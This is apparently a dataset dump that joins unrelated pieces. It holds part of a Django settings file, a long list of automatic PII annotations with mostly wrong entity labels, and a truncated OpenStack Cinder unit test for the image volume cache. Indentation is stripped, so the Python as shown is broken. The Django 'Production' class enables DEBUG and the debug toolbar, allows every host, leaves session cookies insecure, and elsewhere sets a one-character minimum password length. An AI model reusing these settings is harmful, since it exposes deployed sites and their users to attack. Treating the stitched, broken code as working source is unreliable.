########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
""django.contrib.auth.backends.ModelBackend"",
""allauth.account.auth_backends.AuthenticationBackend"",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = ""username""
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = ""mandatory""
ACCOUNT_PASSWORD_MIN_LENGTH = 1
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = ""users.User""
LOGIN_REDIRECT_URL = ""users:redirect""
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line, define 3rd-party library settings
class Local(Common):
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
########## END INSTALLED_APPS
########## Mail settings
EMAIL_HOST = ""localhost""
EMAIL_PORT = 1025
EMAIL_BACKEND = values.Value('django.core.mail.backends.console.EmailBackend')
########## End mail settings
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
#DATABASES = values.DatabaseURLValue('postgres://localhost/projetosgt')
DATABASES = values.DatabaseURLValue('sqlite:////{0}.sqlite'.format(join(BASE_DIR, 'sae_db')))
########## END DATABASE CONFIGURATION
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
########## Your local stuff: Below this line, define 3rd-party library settings
#SITETREE_MODEL_TREE = 'sitetree_smartadmin.SmartTree'
SITETREE_MODEL_TREE_ITEM = 'sitetree_smartadmin.SmartTreeItem'
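# Usage sketch (an added note; the settings-module path config.settings is an
# assumption inferred from ROOT_URLCONF = 'config.urls'): django-configurations
# selects one of these classes via environment variables, e.g.:
#
#   DJANGO_SETTINGS_MODULE=config.settings DJANGO_CONFIGURATION=Local python manage.py runserver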
class Production(Common):
########## INSTALLED_APPS
INSTALLED_APPS = Common.INSTALLED_APPS
INSTALLED_APPS += ('allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.github', )
########## END INSTALLED_APPS
########## SECRET KEY
SECRET_KEY = values.SecretValue()
########## END SECRET KEY
########## django-secure
INSTALLED_APPS += (""djangosecure"", )
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)
SECURE_FRAME_DENY = values.BooleanValue(True)
SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)
SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)
SESSION_COOKIE_SECURE = values.BooleanValue(False)
SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)
SECURE_SSL_REDIRECT = values.BooleanValue(True)
########## end django-secure
########## SITE CONFIGURATION
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [""*""]
########## END SITE CONFIGURATION
INSTALLED_APPS += (""gunicorn"", )
########## STORAGE CONFIGURATION
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = values.SecretValue()
AWS_SECRET_ACCESS_KEY = values.SecretValue()
AWS_STORAGE_BUCKET_NAME = values.SecretValue()
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
# see: https://github.com/antonagestam/collectfast
AWS_PRELOAD_METADATA = True
INSTALLED_APPS += (""collectfast"", )
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIREY = 60 * 60 * 24 * 7
AWS_HEADERS = {
'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY,
AWS_EXPIREY)
}
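# (Added arithmetic note: 60 * 60 * 24 * 7 = 604800 seconds, i.e. 7 days of
# client/CDN caching via the Cache-Control header above.)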
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
########## END STORAGE CONFIGURATION
########## EMAIL
DEFAULT_FROM_EMAIL = values.Value(
'saefacto <dummy@email.com>')
EMAIL_HOST = values.Value('smtp.sendgrid.com')
EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="", environ_name="SENDGRID_PASSWORD")
EMAIL_HOST_USER = values.SecretValue(environ_prefix="", environ_name="SENDGRID_USERNAME")
EMAIL_PORT = values.IntegerValue(587, environ_prefix="", environ_name="EMAIL_PORT")
EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name="EMAIL_SUBJECT_PREFIX")
EMAIL_USE_TLS = True
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
########## END TEMPLATE CONFIGURATION
########## CACHING
# Only do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows.
try:
# See: https://github.com/rdegges/django-heroku-memcacheify
from memcacheify import memcacheify
CACHES = memcacheify()
except ImportError:
CACHES = values.CacheURLValue(default="memcached://127.0.0.1:11211")
########## END CACHING
########## Your production stuff: Below this line, define 3rd-party library settings
########## DEBUG
DEBUG = values.BooleanValue(True)
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## django-debug-toolbar
MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar',)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'],
'SHOW_TEMPLATE_CONTEXT': True,
}
########## end django-debug-toolbar
#######################################################################################
# terribly ugly hack to make PyCharm recognize the libraries
# the code below will never be executed
if 1 == 2:
INSTALLED_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'users', # custom users app
'core',
'main',
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key is only used for development and testing.
# In production, it is replaced by a values.SecretValue() setting.
SECRET_KEY = ""CHANGEME!!!""
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', 'dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
########## END DATABASE CONFIGURATION
########## CACHING
# Do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Los_Angeles'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
""allauth.account.context_processors.account"",
""allauth.socialaccount.context_processors.socialaccount"",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processors go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
########## AUTHENTICATION CONFIGURATION
AUTHENTICATION_BACKENDS = (
""django.contrib.auth.backends.ModelBackend"",
""allauth.account.auth_backends.AuthenticationBackend"",
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = ""username""
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = ""mandatory""
########## END AUTHENTICATION CONFIGURATION
########## Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = ""users.User""
LOGIN_REDIRECT_URL = ""users:redirect""
########## END Custom user app defaults
########## SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""
########## END SLUGLIFIER
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## Your common stuff: Below this line, define 3rd-party library settings
",24139,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://s3.amazonaws.com/%s/'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['PERSON', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['LOCATION', 'django.contrib.messages'], ['PERSON', 'LOCAL_APPS'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['PERSON', 'EMAIL_PORT'], ['LOCATION', 'projetosgt'], ['PERSON', 'sae_db'], ['PERSON', 'INTERCEPT_REDIRECTS'], ['PERSON', 'SITETREE_MODEL_TREE_ITEM'], ['PERSON', 'SmartTreeItem'], ['NRP', 'SECRET_KEY'], ['DATE_TIME', 'this to 60 seconds'], ['NRP', 'SECURE_CONTENT_TYPE_NOSNIFF'], ['LOCATION', 'AWS_SECRET_ACCESS_KEY'], ['PERSON', 'AWS_STORAGE_BUCKET_NAME'], ['LOCATION', 'https://s3.amazonaws.com/%s/'], ['PERSON', 'EMAIL_PORT'], ['PERSON', 'SERVER_EMAIL = EMAIL_HOST_USER'], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'terrivelmente feio para fazer o Pycharm'], ['LOCATION', 'django.contrib.messages'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. 
Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['URL', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts'], ['URL', 'http://django-storages.readthedocs.org/en/latest/index.html'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://github.com/antonagestam/collectfast'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'https://github.com/rdegges/django-heroku-memcacheify'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 
'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'CallingFormat.SU'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'agents.middleware.Us'], ['URL', 'values.Bo'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re'], ['URL', 'values.Bo'], ['URL', 'Common.IN'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.co'], ['URL', 'toolbar.middleware.De'], ['URL', 'smartadmin.Sm'], ['URL', 'smartadmin.Sm'], ['URL', 'Common.IN'], ['URL', 'allauth.socialaccount.pro'], ['URL', 'allauth.socialaccount.providers.gi'], ['URL', 'values.Se'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'storages.ba'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 
'values.Va'], ['URL', 'email.com'], ['URL', 'values.Va'], ['URL', 'smtp.sendgrid.com'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Int'], ['URL', 'values.Va'], ['URL', 'django.template.loaders.ca'], ['URL', 'django.template.loaders.fi'], ['URL', 'values.Ca'], ['URL', 'values.Bo'], ['URL', 'toolbar.middleware.De'], ['URL', 'toolbar.panels.redirects.Red'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re']]"
72,"# Copyright (C) 2015 Pure Storage, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import ddt
import mock
from oslo_utils import timeutils
from cinder import context as ctxt
from cinder.db.sqlalchemy import models
from cinder.image import cache as image_cache
from cinder import objects
from cinder import test
from cinder.tests.unit import fake_constants as fake
@ddt.ddt
class ImageVolumeCacheTestCase(test.TestCase):
def setUp(self):
super(ImageVolumeCacheTestCase, self).setUp()
self.mock_db = mock.Mock()
self.mock_volume_api = mock.Mock()
self.context = ctxt.get_admin_context()
self.volume = models.Volume()
vol_params = {'id': fake.VOLUME_ID,
'host': 'foo@bar#whatever',
'cluster_name': 'cluster',
'size': 0}
self.volume.update(vol_params)
self.volume_ovo = objects.Volume(self.context, **vol_params)
def _build_cache(self, max_gb=0, max_count=0):
cache = image_cache.ImageVolumeCache(self.mock_db,
self.mock_volume_api,
max_gb,
max_count)
cache.notifier = self.notifier
return cache
def _build_entry(self, size=10):
entry = {
'id': 1,
'host': 'test@foo#bar',
'cluster_name': 'cluster@foo#bar',
'image_id': 'PI:KEY',
'image_updated_at': timeutils.utcnow(with_timezone=True),
'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b',
'size': size,
'last_used': timeutils.utcnow(with_timezone=True)
}
return entry
def test_get_by_image_volume(self):
cache = self._build_cache()
ret = {'id': 1}
volume_id = '70a599e0-31e7-49b7-b260-868f441e862b'
self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertEqual(ret, entry)
self.mock_db.image_volume_cache_get_by_volume_id.return_value = None
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertIsNone(entry)
def test_evict(self):
cache = self._build_cache()
entry = self._build_entry()
cache.evict(self.context, entry)
self.mock_db.image_volume_cache_delete.assert_called_once_with(
self.context,
entry['volume_id']
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.evict', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@ddt.data(True, False)
def test_get_entry(self, clustered):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at']
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
if not clustered:
self.volume_ovo.cluster_name = None
expect = {'host': self.volume.host}
else:
expect = {'cluster_name': self.volume.cluster_name}
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertDictEqual(entry, found_entry)
(self.mock_db.
image_volume_cache_get_and_update_last_used.assert_called_once_with)(
self.context,
entry['image_id'],
**expect
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.hit', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_get_entry_not_exists(self):
cache = self._build_cache()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': timeutils.utcnow(with_timezone=True)
}
image_id = 'PI:KEY'
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = None
found_entry = cache.get_entry(self.context,
self.volume_ovo,
image_id,
image_meta)
self.assertIsNone(found_entry)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
